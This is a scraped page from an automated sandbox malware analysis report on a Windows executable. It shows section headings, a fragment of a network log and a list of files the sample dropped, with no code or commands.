Mar 16, 2025 05:20:32.606939077 CET	443	49729	39.103.20.59	192.168.2.4
Mar 16, 2025 05:20:32.60

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Gokod.763652.06.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\4xCNoe\4xCNoe.exe

C:\Program Files (x86)\u0syUl\u0syUl.exe

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_J8daaU.exe_458531a1478468bf3235615eee0fe7f25ff468e_30a9a973_581b625e-1689-49c5-9b43-4786550ddc5d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5C.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9B.tmp.txt

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-51[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\s[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-50[1].jpg

Windows Analysis Report
Gokod.763652.06.exe